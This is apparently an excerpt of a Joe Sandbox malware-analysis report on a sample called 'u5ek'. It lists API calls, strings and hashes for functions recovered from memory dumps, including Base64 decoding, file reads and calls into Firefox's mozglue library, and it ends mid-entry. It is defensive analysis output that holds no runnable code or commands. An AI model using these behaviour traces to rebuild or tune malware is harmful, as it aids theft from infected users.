Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,042F8518), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6BB83A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6BB83BB4
ReleaseSRWLockShared.KERNEL32 ref: 6BB83BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6BB83BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6BB83C91
ReleaseSRWLockShared.KERNEL32 ref: 6BB83CBD
moz_xmalloc.MOZGLUE ref: 6BB83CF1

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 16740de65c0af19e1aae0798d0f16fb8231606946a16384acc11c63e24231ec0
Instruction ID: 096d0a6a20530e697bd959d970841aa7f60171e609e6ac027ec26edb342bfb6f
Opcode Fuzzy Hash: 16740de65c0af19e1aae0798d0f16fb8231606946a16384acc11c63e24231ec0
Instruction Fuzzy Hash: 09C15FB1904781CFC724DF28C09465ABBF6FF89304F158A6EE8998B311D775E885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBEB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F

GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC

Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508

GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
CloseHandle.KERNEL32(?), ref: 6BBBEC55
free.MOZGLUE(00000000), ref: 6BBBEC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
[I %d/%d] profiler_start, xrefs: 6BBBEBB4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: bc9325ec6a64a2801ff3984c97e6b3c581357a875f10edb1f2cd3328a67f0a17
Instruction ID: 33d7f8031a5e67d655066bd0aca9d115be9550431e351eb566c4a3b46d3ff5ab
Opcode Fuzzy Hash: bc9325ec6a64a2801ff3984c97e6b3c581357a875f10edb1f2cd3328a67f0a17
Instruction Fuzzy Hash: 5F1103768005549FDF209F74E849A7E7B6DEF06368F004660FE1997341DB3AD805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBAF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBAD9DB), ref: 6BBAF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BBAF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BBAF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBAF347

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBAF3C8
free.MOZGLUE(00000000,00000000), ref: 6BBAF3F3
free.MOZGLUE(00000000,00000000), ref: 6BBAF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6BBAF413

Strings

ntdll.dll, xrefs: 6BBAF2F0

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: ba885b26c67d3894b5a8d1faa54e88ca64ddc982004838daca56a44aa40b33c1
Instruction ID: 2381a7beacc13d8ba7f57d1cdb4d10bf855421300bb08cf022d842ec407ea601
Opcode Fuzzy Hash: ba885b26c67d3894b5a8d1faa54e88ca64ddc982004838daca56a44aa40b33c1
Instruction Fuzzy Hash: 674111B1E042849BDB04AF78E8527AEB7F9EF45354F10442DD81AE7380EB3AE805C785

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6BBFF618), ref: 6BBD6A68
GetCurrentProcess.KERNEL32 ref: 6BBD6A7D
GetCurrentProcess.KERNEL32 ref: 6BBD6AA1
EnterCriticalSection.KERNEL32(6BBFF618), ref: 6BBD6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BBD6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BBD6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BBD6B65
LeaveCriticalSection.KERNEL32(6BBFF618,?,?), ref: 6BBD6B83

Strings

SymInitialize, xrefs: 6BBD6BA3

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 64fbbff93110b2630ab42ba3446514a9faff379aca9af78b492d619e88a51e9a
Instruction ID: 543a4908e241119b6787bfbb015bf71a292ba3ce215251691995e21072eeb4c3
Opcode Fuzzy Hash: 64fbbff93110b2630ab42ba3446514a9faff379aca9af78b492d619e88a51e9a
Instruction Fuzzy Hash: 4F41C270605384AFDB10CF74D889BAA3BACEF46304F044579ED498F282DBB6D548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBDBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F

GetCurrentThreadId.KERNEL32 ref: 6BBBDBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBBDBE9

Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBBDC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBBDC7F

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

Part of subcall function 6BBB9A60: GetCurrentThreadId.KERNEL32 ref: 6BBB9A95
Part of subcall function 6BBB9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A9D
Part of subcall function 6BBB9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BBB9ACC
Part of subcall function 6BBB9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBB9BA7
Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BBB9BB8
Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BBB9BC9

Part of subcall function 6BBBE8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBE92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD58

Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BBBDBF2

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: 8f5a3e3d7ec5f3fc028e81699edd02b08914b2cb818a403499f94229859fad0f
Instruction ID: cd688494459a2d5307d11e1991667eb57acdde4519e528df53f29afc7ba5405d
Opcode Fuzzy Hash: 8f5a3e3d7ec5f3fc028e81699edd02b08914b2cb818a403499f94229859fad0f
Instruction Fuzzy Hash: CF81E1746007848FCB24DF34E490A6AB7E5FF89308F40892CD89A87791DF79E949CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BB748E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6BBB483A,?), ref: 6BB74ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6BBB483A,?), ref: 6BB74AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6BBB483A,?), ref: 6BB74A82

Part of subcall function 6BB8CA10: mozalloc_abort.MOZGLUE(?), ref: 6BB8CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6BBB483A,?), ref: 6BB74A97
moz_xmalloc.MOZGLUE(15D4E801,?,6BBB483A,?), ref: 6BB74A35

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6BBB483A,?), ref: 6BB74A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6BBB483A,?), ref: 6BB74AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6BBB483A,?), ref: 6BB74B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6BBB483A,?), ref: 6BB74B2C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 9fa82e4bdedf7e619f9e14f5e74a473183b2c80dddea347d5551f9be81e4aadb
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: E6717AB19007869FCB64DF78C4819AAB7F5FF08308B104A3ED56ACB651E735EA55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCAB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBCABB4
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCABC0
ReleaseSRWLockExclusive.KERNEL32(BCF32363), ref: 6BBCAC06
GetCurrentThreadId.KERNEL32 ref: 6BBCAC16
AcquireSRWLockExclusive.KERNEL32(00000001), ref: 6BBCAC27
ReleaseSRWLockExclusive.KERNEL32(BCF32363), ref: 6BBCAC66
free.MOZGLUE(?), ref: 6BBCAD19
free.MOZGLUE(?), ref: 6BBCAD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BBCAD38

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: 57f5314e6f1bb27938954a2516ff3830bfc0b7b068e654f57446c2a3e21d34b1
Instruction ID: d6662655617bee099d123af15b8d908d22e2c432ffaf63146e9ed682c835a49f
Opcode Fuzzy Hash: 57f5314e6f1bb27938954a2516ff3830bfc0b7b068e654f57446c2a3e21d34b1
Instruction Fuzzy Hash: 1A513474600B458FC724DF25C48876ABBF6FF89314F204A2DD5AA87751EB75E844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCCB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBE9
std::_Facet_Register.LIBCPMT ref: 6BBCCBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCC65

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 1ae2ef7fef25117ef0ed30fed5b76a5b71473c5ecac56a5e97c400a9ddb2d09e
Instruction ID: 04466ba1778a5d4bfe4cc2d197d8c5fbc0225f94756b3d538f7c4eaaa363faa3
Opcode Fuzzy Hash: 1ae2ef7fef25117ef0ed30fed5b76a5b71473c5ecac56a5e97c400a9ddb2d09e
Instruction Fuzzy Hash: 4F41A434A003498FCB10DF64C899A6E77B9EF59354F054068E50997352DB3AEC41CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BB7BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BB7BD06

Strings

0, xrefs: 6BB7BC74
y, xrefs: 6BB7BC4E
0, xrefs: 6BB7BBCD

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 77147ed6d427efdd2ec737f9f20a465880c5382ed5f434ad568bff3fcced1925
Instruction ID: e1d3cad980edb556be9b2ca21dd68c595aa8e25aedff0f92b341788a0afa7fc4
Opcode Fuzzy Hash: 77147ed6d427efdd2ec737f9f20a465880c5382ed5f434ad568bff3fcced1925
Instruction Fuzzy Hash: 3961D271A083848FC730DF38C5A1A5FB7E5EF89344F00862EF8A597251DB34D9458B92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB80A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80A72

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

moz_xmalloc.MOZGLUE(?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80AF5
free.MOZGLUE(00000000,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80B9F
free.MOZGLUE(?,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80BDB
free.MOZGLUE(00000000,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80C0A

Strings

alloc overflow, xrefs: 6BB80C05

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: e5b62643f533030d00053f2492eca14e8b419ffd8c81f96839cde40988aecc70
Instruction ID: caec8e35217fdf82e8869f3a043bb3c8d89cfce074b55c906ccfd2988b7da90e
Opcode Fuzzy Hash: e5b62643f533030d00053f2492eca14e8b419ffd8c81f96839cde40988aecc70
Instruction Fuzzy Hash: DA51CFB0A053468FDB24CF28D8C0B6EB3B6FF44388F94496EC85A9B211EB75E544CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BB778C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6BBF008B), ref: 6BB77B89
free.MOZGLUE(?,6BBF008B), ref: 6BB77BAC

Part of subcall function 6BB778C0: free.MOZGLUE(?,6BBF008B), ref: 6BB77BCF

free.MOZGLUE(?,6BBF008B), ref: 6BB77BF2

Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 2d8229859c78af983c4dffcfd227aab8550e9f5a4710838c9667652fff2890d1
Instruction ID: 6ea50c88ec845fe29822075845bf2e4b2d551a175f14b8611f68b926d1266fba
